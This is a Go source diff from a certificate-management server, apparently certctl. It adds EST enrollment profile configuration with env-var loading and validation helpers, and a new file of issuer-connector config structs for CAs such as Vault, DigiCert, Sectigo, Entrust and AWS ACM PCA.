	// held only in process memory and never logged; the handler compares it
	// in constant time with crypto/subtle.ConstantTimeCompare.
	EnrollmentPassword string

	// MTLSEnabled gates the sibling /.well-known/est-mtls/<PathID>/ route
	// (Phase 2). When true, that route requires a client certificate that
	// chains to one of the certificates in MTLSClientCATrustBundlePath. The
	// standard /.well-known/est/<PathID>/ route stays on application-layer
	// auth (HTTP Basic password) so existing clients keep working: mTLS is
	// additive, not a replacement.
	//
	// Mirrors SCEP's MTLSEnabled (commit e7a3075) with the same
	// defense-in-depth rationale: enterprise procurement teams routinely
	// reject 'shared password authentication' as a checkbox-fail no matter
	// how strong the password is, so this flag wires up a sibling route that
	// adds client-cert auth at the handler layer.
	MTLSEnabled bool

	// MTLSClientCATrustBundlePath points at the PEM bundle of CA
	// certificates that sign the client (device-bootstrap) certificates
	// allowed to enroll through the mTLS sibling route. Required when
	// MTLSEnabled is true. It is validated at startup by
	// cmd/server/main.go's preflightESTMTLSClientCATrustBundle (Phase 2):
	// the file exists, parses as PEM, contains ≥1 cert, and none is expired.
	MTLSClientCATrustBundlePath string

	// ChannelBindingRequired makes the EST mTLS handler (Phase 2) demand
	// RFC 9266 tls-exporter channel binding in the CSR's CMC
	// id-aa-channelBindings attribute. When true, a CSR without the binding
	// is refused with ErrChannelBindingMissing and a mismatched binding with
	// ErrChannelBindingMismatch. The Phase 2 design defaults this to true
	// for new-cert-issuance flows and to false for re-enrollment, where
	// presenting the previous certificate is the trust signal. Operators
	// whose clients lack RFC 9266 support (older libest, etc.) can opt out
	// per profile.
	//
	// NOTE(review): loadESTProfilesFromEnv reads this flag with a default of
	// false; confirm where the "true for new issuance" default is applied.
	//
	// EST RFC 7030 hardening master bundle Phase 0 frozen decision 0.2.
	ChannelBindingRequired bool

	// AllowedAuthModes lists the application-layer auth modes this profile
	// accepts. Valid entries: "mtls", "basic". An empty slice means no auth
	// is required, which is the unauthenticated default EST shipped with at
	// v2.0.66 and is preserved for backward compatibility; Validate emits a
	// warning log for empty slices to nudge operators toward explicit
	// opt-in. Phases 2 and 3 read this to enforce per-mode requirements;
	// Phase 1 only validates its shape.
	//
	// EST RFC 7030 hardening master bundle Phase 0 frozen decision 0.1.
	AllowedAuthModes []string

	// RateLimitPerPrincipal24h caps enrollments per (CSR.Subject.CN,
	// sourceIP) pair within any rolling 24-hour window. Default 0: Phase 1
	// keeps the unauthenticated/unlimited default so production behavior
	// does not change. Phase 4 will wire the value into the extracted
	// internal/ratelimit/SlidingWindowLimiter. Negative values are rejected
	// at Validate time as a config typo.
	//
	// EST RFC 7030 hardening master bundle Phase 1 + Phase 4.
	RateLimitPerPrincipal24h int

	// ServerKeygenEnabled gates the /.well-known/est/<PathID>/serverkeygen
	// endpoint (RFC 7030 §4.4) for this profile. When true, the server
	// generates the keypair on the client's behalf and returns both the
	// certificate and the private key (the key wrapped in CMS
	// EnvelopedData). Default false. Phase 5 wires the handler; Phase 1
	// provides the gate plus the Validate refusal for
	// ServerKeygenEnabled=true without a CertificateProfile that pins
	// AllowedKeyAlgorithms (the server must know which algorithm to
	// generate).
	//
	// EST RFC 7030 hardening master bundle Phase 5.
	ServerKeygenEnabled bool
}
|
||||||
|
|
||||||
|
// loadESTProfilesFromEnv reads the indexed CERTCTL_EST_PROFILES env var
|
||||||
|
// (e.g. "corp,iot,wifi") and expands each name into an ESTProfileConfig
|
||||||
|
// populated from CERTCTL_EST_PROFILE_<NAME>_*. Returns nil when the
|
||||||
|
// CERTCTL_EST_PROFILES env var is unset or empty — in that case the
|
||||||
|
// legacy-shim path (mergeESTLegacyIntoProfiles, called from Load after
|
||||||
|
// the initial config build) populates Profiles[0] from the flat fields
|
||||||
|
// if needed.
|
||||||
|
//
|
||||||
|
// PathID for each profile is the lowercased trimmed name from the
|
||||||
|
// CERTCTL_EST_PROFILES list (e.g. "Corp" -> "corp"). Validation that
|
||||||
|
// the PathID is path-safe ([a-z0-9-]+) lives in Config.Validate() so
|
||||||
|
// the loader can stay free of error returns.
|
||||||
|
//
|
||||||
|
// Mirrors loadSCEPProfilesFromEnv exactly. EST RFC 7030 hardening Phase 1.
|
||||||
|
func loadESTProfilesFromEnv() []ESTProfileConfig {
|
||||||
|
raw := strings.TrimSpace(os.Getenv("CERTCTL_EST_PROFILES"))
|
||||||
|
if raw == "" {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
names := strings.Split(raw, ",")
|
||||||
|
out := make([]ESTProfileConfig, 0, len(names))
|
||||||
|
for _, n := range names {
|
||||||
|
n = strings.TrimSpace(n)
|
||||||
|
if n == "" {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
// The env-var key is the upper-cased name (CERTCTL_EST_PROFILE_CORP_*),
|
||||||
|
// but the URL path segment is the lower-cased name to match the
|
||||||
|
// path-safe slug constraint enforced in Validate.
|
||||||
|
envName := strings.ToUpper(n)
|
||||||
|
pathID := strings.ToLower(n)
|
||||||
|
out = append(out, ESTProfileConfig{
|
||||||
|
PathID: pathID,
|
||||||
|
IssuerID: getEnv("CERTCTL_EST_PROFILE_"+envName+"_ISSUER_ID", ""),
|
||||||
|
ProfileID: getEnv("CERTCTL_EST_PROFILE_"+envName+"_PROFILE_ID", ""),
|
||||||
|
EnrollmentPassword: getEnv("CERTCTL_EST_PROFILE_"+envName+"_ENROLLMENT_PASSWORD", ""),
|
||||||
|
MTLSEnabled: getEnvBool("CERTCTL_EST_PROFILE_"+envName+"_MTLS_ENABLED", false),
|
||||||
|
MTLSClientCATrustBundlePath: getEnv("CERTCTL_EST_PROFILE_"+envName+"_MTLS_CLIENT_CA_TRUST_BUNDLE_PATH", ""),
|
||||||
|
ChannelBindingRequired: getEnvBool("CERTCTL_EST_PROFILE_"+envName+"_CHANNEL_BINDING_REQUIRED", false),
|
||||||
|
AllowedAuthModes: parseAuthModes(getEnv("CERTCTL_EST_PROFILE_"+envName+"_ALLOWED_AUTH_MODES", "")),
|
||||||
|
RateLimitPerPrincipal24h: getEnvInt("CERTCTL_EST_PROFILE_"+envName+"_RATE_LIMIT_PER_PRINCIPAL_24H", 0),
|
||||||
|
ServerKeygenEnabled: getEnvBool("CERTCTL_EST_PROFILE_"+envName+"_SERVERKEYGEN_ENABLED", false),
|
||||||
|
})
|
||||||
|
}
|
||||||
|
return out
|
||||||
|
}
|
||||||
|
|
||||||
|
// parseAuthModes turns a comma-separated env value into a normalized list of
// auth-mode tokens.
//
// Blank (empty or whitespace-only) input yields nil, which is the
// "unauthenticated default" Phase 1 preserves for back-compat. Otherwise each
// comma-separated piece is trimmed and lower-cased, and pieces that end up
// empty are dropped. Tokens are not checked against the set of known modes
// here: unknown ones are passed through so Validate can refuse them with an
// error message naming the offending token.
func parseAuthModes(s string) []string {
	trimmed := strings.TrimSpace(s)
	if trimmed == "" {
		return nil
	}

	pieces := strings.Split(trimmed, ",")
	modes := make([]string, 0, len(pieces))
	for i := range pieces {
		if tok := strings.ToLower(strings.TrimSpace(pieces[i])); tok != "" {
			modes = append(modes, tok)
		}
	}
	return modes
}
|
||||||
|
|
||||||
|
// mergeESTLegacyIntoProfiles is the EST backward-compat shim. When
|
||||||
|
// Profiles is empty AND the legacy single-issuer fields are populated
|
||||||
|
// (Enabled=true is the trigger; IssuerID has a non-empty default so it
|
||||||
|
// can't be the trigger by itself), synthesise a single-element
|
||||||
|
// Profiles[0] with PathID="" so /.well-known/est/ dispatches identically
|
||||||
|
// to the pre-Phase-1 deploy. No-op when Profiles is non-empty (the
|
||||||
|
// operator explicitly opted into the structured form via
|
||||||
|
// CERTCTL_EST_PROFILES) or when EST is disabled.
|
||||||
|
//
|
||||||
|
// EST's legacy single-issuer config has fewer "trigger" fields than
|
||||||
|
// SCEP's (no per-profile RA pair, no per-profile challenge password —
|
||||||
|
// both of those land in Phases 2/3 of the hardening bundle). The shim
|
||||||
|
// triggers whenever EST is enabled, since the operator clearly intends
|
||||||
|
// to serve EST. This makes the back-compat behavior identical to v2.0.66
|
||||||
|
// (single /.well-known/est/ root with the operator's chosen issuer).
|
||||||
|
//
|
||||||
|
// EST RFC 7030 hardening Phase 1.
|
||||||
|
func mergeESTLegacyIntoProfiles(c *ESTConfig) {
|
||||||
|
if c == nil || !c.Enabled || len(c.Profiles) > 0 {
|
||||||
|
return
|
||||||
|
}
|
||||||
|
c.Profiles = []ESTProfileConfig{{
|
||||||
|
PathID: "", // empty pathID maps to the legacy /.well-known/est/ root
|
||||||
|
IssuerID: c.IssuerID,
|
||||||
|
ProfileID: c.ProfileID,
|
||||||
|
// No legacy fields exist for EnrollmentPassword, MTLS*, etc. —
|
||||||
|
// those land in Phases 2/3. Operators upgrading from v2.0.66 get
|
||||||
|
// the same unauthenticated behavior they had before; opting into
|
||||||
|
// auth requires moving to the structured CERTCTL_EST_PROFILES
|
||||||
|
// form (which Phase 12 docs as the recommended migration path).
|
||||||
|
}}
|
||||||
|
}
|
||||||
|
|
||||||
|
// validESTPathID reports whether s is an acceptable EST profile path
// segment.
//
// The empty string is accepted (it denotes the legacy root). Any other value
// must consist only of ASCII lowercase letters, digits and hyphens, and must
// neither start nor end with a hyphen. This is the same shape as
// validSCEPPathID; the two are deliberately kept as separate functions so
// that EST-specific path constraints (e.g. RFC 7030 §3.2.2 reserved path
// segments) can be added here later without touching SCEP's validator.
//
// EST RFC 7030 hardening Phase 1.
func validESTPathID(s string) bool {
	n := len(s)
	if n == 0 {
		return true // empty maps to legacy /.well-known/est/ root
	}
	if first, last := s[0], s[n-1]; first == '-' || last == '-' {
		return false
	}
	// Inspect bytes, not runes: every byte of a multi-byte UTF-8 sequence is
	// outside the allowed ASCII set and is therefore rejected.
	for _, b := range []byte(s) {
		switch {
		case 'a' <= b && b <= 'z':
		case '0' <= b && b <= '9':
		case b == '-':
		default:
			return false
		}
	}
	return true
}
|
||||||
|
|
||||||
|
// validESTAuthMode reports whether mode is one of the documented EST auth
// modes ("mtls" or "basic") that Phase 2 and Phase 3 will dispatch on. The
// comparison is exact and case-sensitive.
//
// It exists so Validate can refuse unknown modes (typos, or future modes this
// binary does not yet implement) at startup with a clear error, rather than
// at first request with a confusing 401/403.
//
// EST RFC 7030 hardening Phase 1.
func validESTAuthMode(mode string) bool {
	return mode == "mtls" || mode == "basic"
}
|
||||||
@@ -0,0 +1,435 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package config
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 7 (2026-05-14): extracted from
|
||||||
|
// config.go. The LAST in-config cut of Phase 9. Sprint 7 collects
|
||||||
|
// the issuer-connector configurations — every external CA the local
|
||||||
|
// server talks UP to (StepCA, Vault, DigiCert, Sectigo, GoogleCAS,
|
||||||
|
// AWS ACM PCA, Entrust, GlobalSign, EJBCA, OpenSSL) plus the
|
||||||
|
// local CA mode + key-generation policy.
|
||||||
|
//
|
||||||
|
// Twelve structs move:
|
||||||
|
//
|
||||||
|
// KeygenConfig — global key-generation policy (Mode: "agent"
|
||||||
|
// production default, or "server" demo-only).
|
||||||
|
// CAConfig — Local CA mode: self-signed vs sub-CA
|
||||||
|
// (CertPath + KeyPath).
|
||||||
|
// StepCAConfig — step-ca issuer (URL + JWK provisioner).
|
||||||
|
// VaultConfig — HashiCorp Vault PKI (Addr + Token + Mount +
|
||||||
|
// Role + TTL).
|
||||||
|
// DigiCertConfig — DigiCert CertCentral (APIKey + OrgID +
|
||||||
|
// ProductType + BaseURL + PollMaxWait).
|
||||||
|
// SectigoConfig — Sectigo Certificate Manager (CustomerURI +
|
||||||
|
// Login + Password + OrgID + CertType + Term +
|
||||||
|
// BaseURL + PollMaxWait).
|
||||||
|
// GoogleCASConfig — Google Cloud CA Service (Project + Location +
|
||||||
|
// CAPool + Credentials + TTL).
|
||||||
|
// AWSACMPCAConfig — AWS ACM Private CA (Region + CAArn +
|
||||||
|
// SigningAlgorithm + ValidityDays +
|
||||||
|
// TemplateArn).
|
||||||
|
// EntrustConfig — Entrust Certificate Services (APIUrl + mTLS
|
||||||
|
// client cert/key + CAId + ProfileId +
|
||||||
|
// PollMaxWait).
|
||||||
|
// GlobalSignConfig — GlobalSign Atlas HVCA (APIUrl + APIKey +
|
||||||
|
// APISecret + mTLS client cert/key + ServerCA
|
||||||
|
// + PollMaxWait).
|
||||||
|
// EJBCAConfig — EJBCA / Keyfactor (APIUrl + AuthMode +
|
||||||
|
// mTLS / OAuth2 token + CAName + cert profile
|
||||||
|
// + EE profile).
|
||||||
|
// OpenSSLConfig — OpenSSL / custom CA (SignScript + RevokeScript
|
||||||
|
// + CRLScript + TimeoutSeconds).
|
||||||
|
//
|
||||||
|
// No helpers move. The bodies are pure-data field declarations —
|
||||||
|
// the simplest possible split shape since every issuer config
|
||||||
|
// struct uses only stdlib primitive types (string, int, bool) and
|
||||||
|
// no time.Duration, no nested struct, no helper-function reference.
|
||||||
|
// Verified by: `awk 'NR>=136 && NR<=269 || NR>=355 && NR<=527 ||
|
||||||
|
// NR>=586 && NR<=609' internal/config/config.go | grep -E '\btime\.
|
||||||
|
// |\bos\.|\bfmt\.'` → empty pre-move. issuers.go therefore needs
|
||||||
|
// ZERO imports beyond the package declaration.
|
||||||
|
//
|
||||||
|
// Edit shape
|
||||||
|
// ==========
|
||||||
|
// Sprint 7 used three independent sed deletes from highest-line to
|
||||||
|
// lowest-line (same pattern Sprint 6 introduced) because the 12
|
||||||
|
// issuer structs were SCATTERED across config.go interleaved with
|
||||||
|
// non-issuer types:
|
||||||
|
//
|
||||||
|
// Block 1 (top of file, after Config + OCSPResponderConfig):
|
||||||
|
// AWSACMPCAConfig (137) + EntrustConfig (168) +
|
||||||
|
// GlobalSignConfig (199) + EJBCAConfig (236).
|
||||||
|
// Followed by EncryptionConfig (271) — NOT an issuer; stays.
|
||||||
|
//
|
||||||
|
// Block 2 (middle, after the discovery configs):
|
||||||
|
// KeygenConfig (356) + CAConfig (367) + StepCAConfig (382) +
|
||||||
|
// VaultConfig (401) + DigiCertConfig (429) + SectigoConfig (458) +
|
||||||
|
// GoogleCASConfig (501).
|
||||||
|
// Followed by DigestConfig (529) — notifier-policy; stays.
|
||||||
|
//
|
||||||
|
// Block 3 (single, between HealthCheck and NetworkScan):
|
||||||
|
// OpenSSLConfig (587).
|
||||||
|
//
|
||||||
|
// What stayed in config.go
|
||||||
|
// ========================
|
||||||
|
// - OCSPResponderConfig (114) — server-side OCSP responder, not
|
||||||
|
// issuer-side; conceptually adjacent to ServerConfig (already
|
||||||
|
// moved). Could be folded into server.go in a future cut; left
|
||||||
|
// in place this sprint to keep the cut scope tight.
|
||||||
|
// - EncryptionConfig (271 pre-move) — config-at-rest encryption,
|
||||||
|
// not issuer-side.
|
||||||
|
// - The cloud-discovery family (CloudDiscoveryConfig +
|
||||||
|
// AWSSecretsMgrDiscoveryConfig + AzureKVDiscoveryConfig +
|
||||||
|
// GCPSecretMgrDiscoveryConfig) — those are DISCOVERY sources,
|
||||||
|
// not ISSUER connectors. Reading from cloud secret managers to
|
||||||
|
// find certificates someone else issued; not signing.
|
||||||
|
// - DigestConfig + HealthCheckConfig — notifier/health-monitor
|
||||||
|
// policy, not issuer-related.
|
||||||
|
// - NetworkScanConfig + VerificationConfig — discovery / verify,
|
||||||
|
// not issuer-related.
|
||||||
|
// - ApprovalConfig — RBAC issuance-approval workflow; stays per
|
||||||
|
// Sprint 6's reasoning.
|
||||||
|
// - All Load() / Validate() bodies that reference the moved
|
||||||
|
// issuer-config types (cross-cutting validation logic stays
|
||||||
|
// in config.go).
|
||||||
|
//
|
||||||
|
// Public-surface invariant
|
||||||
|
// ========================
|
||||||
|
// Every type, exported field, and doc-comment is byte-identical to
|
||||||
|
// pre-split. Package stays `config`. Every external caller of
|
||||||
|
// `config.AWSACMPCAConfig` / `config.EntrustConfig` /
|
||||||
|
// `config.KeygenConfig` / etc. resolves the same way. None of these
|
||||||
|
// types declare an exported method; the entire surface is fields,
|
||||||
|
// preserved verbatim.
|
||||||
|
|
||||||
|
// AWSACMPCAConfig holds the settings for the AWS ACM Private CA issuer
// connector.
type AWSACMPCAConfig struct {
	// Region is the AWS region that hosts the Private CA (e.g. "us-east-1").
	// Required for AWS ACM PCA integration.
	// Setting: CERTCTL_AWS_PCA_REGION environment variable.
	Region string

	// CAArn is the ARN of the ACM Private CA certificate authority.
	// Format: arn:aws:acm-pca:<region>:<account>:certificate-authority/<id>
	// Required for AWS ACM PCA integration.
	// Setting: CERTCTL_AWS_PCA_CA_ARN environment variable.
	CAArn string

	// SigningAlgorithm selects the algorithm used to sign issued
	// certificates.
	// Valid: SHA256WITHRSA, SHA384WITHRSA, SHA512WITHRSA, SHA256WITHECDSA,
	// SHA384WITHECDSA, SHA512WITHECDSA.
	// Default: "SHA256WITHRSA".
	// Setting: CERTCTL_AWS_PCA_SIGNING_ALGORITHM environment variable.
	SigningAlgorithm string

	// ValidityDays is the validity period of issued certificates, in days.
	// Default: 365.
	// Setting: CERTCTL_AWS_PCA_VALIDITY_DAYS environment variable.
	ValidityDays int

	// TemplateArn is the optional ARN of an ACM PCA certificate template,
	// used for constrained subordinate CAs or custom certificate profiles.
	// Setting: CERTCTL_AWS_PCA_TEMPLATE_ARN environment variable.
	TemplateArn string
}
|
||||||
|
|
||||||
|
// EntrustConfig holds the settings for the Entrust Certificate Services
// issuer connector. Entrust authenticates callers with an mTLS client
// certificate.
type EntrustConfig struct {
	// APIUrl is the base URL of the Entrust CA Gateway.
	// Setting: CERTCTL_ENTRUST_API_URL environment variable.
	APIUrl string

	// ClientCertPath is the filesystem path of the mTLS client certificate
	// PEM file.
	// Setting: CERTCTL_ENTRUST_CLIENT_CERT_PATH environment variable.
	ClientCertPath string

	// ClientKeyPath is the filesystem path of the mTLS client private key
	// PEM file.
	// Setting: CERTCTL_ENTRUST_CLIENT_KEY_PATH environment variable.
	ClientKeyPath string

	// CAId identifies the Entrust CA.
	// Setting: CERTCTL_ENTRUST_CA_ID environment variable.
	CAId string

	// ProfileId is the optional enrollment profile identifier.
	// Setting: CERTCTL_ENTRUST_PROFILE_ID environment variable.
	ProfileId string

	// PollMaxWaitSeconds caps the bounded-polling deadline of
	// GetOrderStatus. Approval-pending workflows should raise it (e.g.
	// 86400 = 24h) so that a single tick can wait through the approval
	// window. Default 600. Audit fix #5.
	// Setting: CERTCTL_ENTRUST_POLL_MAX_WAIT_SECONDS.
	PollMaxWaitSeconds int
}
|
||||||
|
|
||||||
|
// GlobalSignConfig contains GlobalSign Atlas HVCA issuer connector configuration.
|
||||||
|
// GlobalSign uses mTLS client certificate authentication plus API key/secret headers.
|
||||||
|
type GlobalSignConfig struct {
|
||||||
|
// APIUrl is the GlobalSign Atlas HVCA base URL (region-aware).
|
||||||
|
// Setting: CERTCTL_GLOBALSIGN_API_URL environment variable.
|
||||||
|
APIUrl string
|
||||||
|
|
||||||
|
// APIKey is the GlobalSign API key.
|
||||||
|
// Setting: CERTCTL_GLOBALSIGN_API_KEY environment variable.
|
||||||
|
APIKey string
|
||||||
|
|
||||||
|
// APISecret is the GlobalSign API secret.
|
||||||
|
// Setting: CERTCTL_GLOBALSIGN_API_SECRET environment variable.
|
||||||
|
APISecret string
|
||||||
|
|
||||||
|
// ClientCertPath is the path to the mTLS client certificate PEM file.
|
||||||
|
// Setting: CERTCTL_GLOBALSIGN_CLIENT_CERT_PATH environment variable.
|
||||||
|
ClientCertPath string
|
||||||
|
|
||||||
|
// ClientKeyPath is the path to the mTLS client private key PEM file.
|
||||||
|
// Setting: CERTCTL_GLOBALSIGN_CLIENT_KEY_PATH environment variable.
|
||||||
|
ClientKeyPath string
|
||||||
|
|
||||||
|
// ServerCAPath is the optional path to a PEM file containing the CA
|
||||||
|
// certificate(s) used to verify the GlobalSign Atlas HVCA API server
|
||||||
|
// certificate. If empty, the system trust store is used. Set this
|
||||||
|
// for private/lab Atlas deployments whose server TLS chain is not
|
||||||
|
// present in the host's default trust bundle.
|
||||||
|
// Setting: CERTCTL_GLOBALSIGN_SERVER_CA_PATH environment variable.
|
||||||
|
ServerCAPath string
|
||||||
|
|
||||||
|
// PollMaxWaitSeconds caps GetOrderStatus's bounded-polling
|
||||||
|
// deadline. Default 600 (10 minutes). Audit fix #5.
|
||||||
|
// Setting: CERTCTL_GLOBALSIGN_POLL_MAX_WAIT_SECONDS.
|
||||||
|
PollMaxWaitSeconds int
|
||||||
|
}
|
||||||
|
|
||||||
|
// EJBCAConfig contains EJBCA (Keyfactor) issuer connector configuration.
|
||||||
|
// EJBCA supports dual authentication: mTLS or OAuth2 Bearer token.
|
||||||
|
type EJBCAConfig struct {
|
||||||
|
// APIUrl is the EJBCA REST API base URL.
|
||||||
|
// Setting: CERTCTL_EJBCA_API_URL environment variable.
|
||||||
|
APIUrl string
|
||||||
|
|
||||||
|
// AuthMode selects the authentication method: "mtls" or "oauth2". Default: "mtls".
|
||||||
|
// Setting: CERTCTL_EJBCA_AUTH_MODE environment variable.
|
||||||
|
AuthMode string
|
||||||
|
|
||||||
|
// ClientCertPath is the path to the mTLS client certificate PEM file (required when auth_mode=mtls).
|
||||||
|
// Setting: CERTCTL_EJBCA_CLIENT_CERT_PATH environment variable.
|
||||||
|
ClientCertPath string
|
||||||
|
|
||||||
|
// ClientKeyPath is the path to the mTLS client private key PEM file (required when auth_mode=mtls).
|
||||||
|
// Setting: CERTCTL_EJBCA_CLIENT_KEY_PATH environment variable.
|
||||||
|
ClientKeyPath string
|
||||||
|
|
||||||
|
// Token is the OAuth2 Bearer token (required when auth_mode=oauth2).
|
||||||
|
// Setting: CERTCTL_EJBCA_TOKEN environment variable.
|
||||||
|
Token string
|
||||||
|
|
||||||
|
// CAName is the EJBCA CA name. Required.
|
||||||
|
// Setting: CERTCTL_EJBCA_CA_NAME environment variable.
|
||||||
|
CAName string
|
||||||
|
|
||||||
|
// CertProfile is the optional EJBCA certificate profile name.
|
||||||
|
// Setting: CERTCTL_EJBCA_CERT_PROFILE environment variable.
|
||||||
|
CertProfile string
|
||||||
|
|
||||||
|
// EEProfile is the optional EJBCA end-entity profile name.
|
||||||
|
// Setting: CERTCTL_EJBCA_EE_PROFILE environment variable.
|
||||||
|
EEProfile string
|
||||||
|
}
|
||||||
|
|
||||||
|
// KeygenConfig controls where private keys are generated.
|
||||||
|
type KeygenConfig struct {
|
||||||
|
// Mode determines where certificate private keys are generated.
|
||||||
|
// Valid values: "agent" (default, production) or "server" (demo only).
|
||||||
|
// In "agent" mode, renewal/issuance jobs enter AwaitingCSR state and agents
|
||||||
|
// generate ECDSA P-256 keys locally. Private keys never leave agent infrastructure.
|
||||||
|
// In "server" mode, the control plane generates RSA keys — demo only, not for production
|
||||||
|
// as private keys touch the server. Requires explicit opt-in.
|
||||||
|
Mode string
|
||||||
|
}
|
||||||
|
|
||||||
|
// CAConfig controls the Local CA's operating mode.
|
||||||
|
type CAConfig struct {
|
||||||
|
// CertPath is the path to a PEM-encoded CA certificate for sub-CA mode.
|
||||||
|
// When set with KeyPath, the Local CA loads this cert instead of generating a self-signed root.
|
||||||
|
// Required: sub-CA mode must have both CertPath and KeyPath set.
|
||||||
|
// Optional: leave empty for self-signed mode (development/demo). Path must be absolute.
|
||||||
|
CertPath string
|
||||||
|
|
||||||
|
// KeyPath is the path to a PEM-encoded CA private key for sub-CA mode.
|
||||||
|
// Supports RSA, ECDSA, and PKCS#8 encoded keys.
|
||||||
|
// Required: must be set together with CertPath for sub-CA mode.
|
||||||
|
// Optional: leave empty for self-signed mode (development/demo). Path must be absolute.
|
||||||
|
KeyPath string
|
||||||
|
}
|
||||||
|
|
||||||
|
// StepCAConfig contains step-ca issuer connector configuration.
|
||||||
|
type StepCAConfig struct {
|
||||||
|
// URL is the base URL of the step-ca server.
|
||||||
|
// Example: "https://ca.example.com:9000". Required for step-ca integration.
|
||||||
|
URL string
|
||||||
|
|
||||||
|
// ProvisionerName is the name of the JWK provisioner configured in step-ca.
|
||||||
|
// Used to select which provisioner signs the certificate requests.
|
||||||
|
ProvisionerName string
|
||||||
|
|
||||||
|
// ProvisionerKeyPath is the path to the PEM-encoded JWK provisioner private key.
|
||||||
|
// Authenticates with the step-ca /sign API. Must be an absolute path.
|
||||||
|
ProvisionerKeyPath string
|
||||||
|
|
||||||
|
// ProvisionerPassword is the optional password for the provisioner private key.
|
||||||
|
// Leave empty if the key file is not encrypted.
|
||||||
|
ProvisionerPassword string
|
||||||
|
}
|
||||||
|
|
||||||
|
// VaultConfig contains HashiCorp Vault PKI issuer connector configuration.
|
||||||
|
type VaultConfig struct {
|
||||||
|
// Addr is the Vault server address (e.g., "https://vault.example.com:8200").
|
||||||
|
// Required for Vault PKI integration.
|
||||||
|
// Setting: CERTCTL_VAULT_ADDR environment variable.
|
||||||
|
Addr string
|
||||||
|
|
||||||
|
// Token is the Vault token for authentication.
|
||||||
|
// Required for Vault PKI integration.
|
||||||
|
// Setting: CERTCTL_VAULT_TOKEN environment variable.
|
||||||
|
Token string
|
||||||
|
|
||||||
|
// Mount is the PKI secrets engine mount path.
|
||||||
|
// Default: "pki".
|
||||||
|
// Setting: CERTCTL_VAULT_MOUNT environment variable.
|
||||||
|
Mount string
|
||||||
|
|
||||||
|
// Role is the PKI role name used for signing certificates.
|
||||||
|
// Required for Vault PKI integration.
|
||||||
|
// Setting: CERTCTL_VAULT_ROLE environment variable.
|
||||||
|
Role string
|
||||||
|
|
||||||
|
// TTL is the requested certificate time-to-live.
|
||||||
|
// Default: "8760h" (1 year).
|
||||||
|
// Setting: CERTCTL_VAULT_TTL environment variable.
|
||||||
|
TTL string
|
||||||
|
}
|
||||||
|
|
||||||
|
// DigiCertConfig contains DigiCert CertCentral issuer connector configuration.
|
||||||
|
type DigiCertConfig struct {
|
||||||
|
// APIKey is the CertCentral API key for authentication.
|
||||||
|
// Required for DigiCert integration.
|
||||||
|
// Setting: CERTCTL_DIGICERT_API_KEY environment variable.
|
||||||
|
APIKey string
|
||||||
|
|
||||||
|
// OrgID is the DigiCert organization ID for certificate orders.
|
||||||
|
// Required for DigiCert integration.
|
||||||
|
// Setting: CERTCTL_DIGICERT_ORG_ID environment variable.
|
||||||
|
OrgID string
|
||||||
|
|
||||||
|
// ProductType is the DigiCert product type for certificate orders.
|
||||||
|
// Default: "ssl_basic". Common values: "ssl_basic", "ssl_wildcard", "ssl_ev_basic".
|
||||||
|
// Setting: CERTCTL_DIGICERT_PRODUCT_TYPE environment variable.
|
||||||
|
ProductType string
|
||||||
|
|
||||||
|
// BaseURL is the DigiCert CertCentral API base URL.
|
||||||
|
// Default: "https://www.digicert.com/services/v2".
|
||||||
|
// Setting: CERTCTL_DIGICERT_BASE_URL environment variable.
|
||||||
|
BaseURL string
|
||||||
|
|
||||||
|
// PollMaxWaitSeconds caps how long GetOrderStatus blocks doing
|
||||||
|
// internal exponential-backoff polling before returning. Default
|
||||||
|
// 600 (10 minutes); 0 falls back to asyncpoll default.
|
||||||
|
// Setting: CERTCTL_DIGICERT_POLL_MAX_WAIT_SECONDS. Audit fix #5.
|
||||||
|
PollMaxWaitSeconds int
|
||||||
|
}
|
||||||
|
|
||||||
|
// SectigoConfig contains Sectigo Certificate Manager issuer connector configuration.
|
||||||
|
type SectigoConfig struct {
|
||||||
|
// CustomerURI is the Sectigo customer URI (organization identifier).
|
||||||
|
// Required for Sectigo integration.
|
||||||
|
// Setting: CERTCTL_SECTIGO_CUSTOMER_URI environment variable.
|
||||||
|
CustomerURI string
|
||||||
|
|
||||||
|
// Login is the Sectigo API account login.
|
||||||
|
// Required for Sectigo integration.
|
||||||
|
// Setting: CERTCTL_SECTIGO_LOGIN environment variable.
|
||||||
|
Login string
|
||||||
|
|
||||||
|
// Password is the Sectigo API account password or API key.
|
||||||
|
// Required for Sectigo integration.
|
||||||
|
// Setting: CERTCTL_SECTIGO_PASSWORD environment variable.
|
||||||
|
Password string
|
||||||
|
|
||||||
|
// OrgID is the Sectigo organization ID for certificate enrollments.
|
||||||
|
// Required for Sectigo integration.
|
||||||
|
// Setting: CERTCTL_SECTIGO_ORG_ID environment variable.
|
||||||
|
OrgID int
|
||||||
|
|
||||||
|
// CertType is the Sectigo certificate type ID (from GET /ssl/v1/types).
|
||||||
|
// Required for enrollment. Setting: CERTCTL_SECTIGO_CERT_TYPE environment variable.
|
||||||
|
CertType int
|
||||||
|
|
||||||
|
// Term is the certificate validity in days (e.g., 365, 730).
|
||||||
|
// Default: 365.
|
||||||
|
// Setting: CERTCTL_SECTIGO_TERM environment variable.
|
||||||
|
Term int
|
||||||
|
|
||||||
|
// BaseURL is the Sectigo SCM API base URL.
|
||||||
|
// Default: "https://cert-manager.com/api".
|
||||||
|
// Setting: CERTCTL_SECTIGO_BASE_URL environment variable.
|
||||||
|
BaseURL string
|
||||||
|
|
||||||
|
// PollMaxWaitSeconds caps how long GetOrderStatus blocks doing
|
||||||
|
// internal exponential-backoff polling. Default 600. Sectigo's
|
||||||
|
// collectNotReady sentinel rides the backoff schedule.
|
||||||
|
// Setting: CERTCTL_SECTIGO_POLL_MAX_WAIT_SECONDS. Audit fix #5.
|
||||||
|
PollMaxWaitSeconds int
|
||||||
|
}
|
||||||
|
|
||||||
|
// GoogleCASConfig contains Google Cloud Certificate Authority Service configuration.
|
||||||
|
type GoogleCASConfig struct {
|
||||||
|
// Project is the GCP project ID.
|
||||||
|
// Required for Google CAS integration.
|
||||||
|
// Setting: CERTCTL_GOOGLE_CAS_PROJECT environment variable.
|
||||||
|
Project string
|
||||||
|
|
||||||
|
// Location is the GCP region (e.g., "us-central1").
|
||||||
|
// Required for Google CAS integration.
|
||||||
|
// Setting: CERTCTL_GOOGLE_CAS_LOCATION environment variable.
|
||||||
|
Location string
|
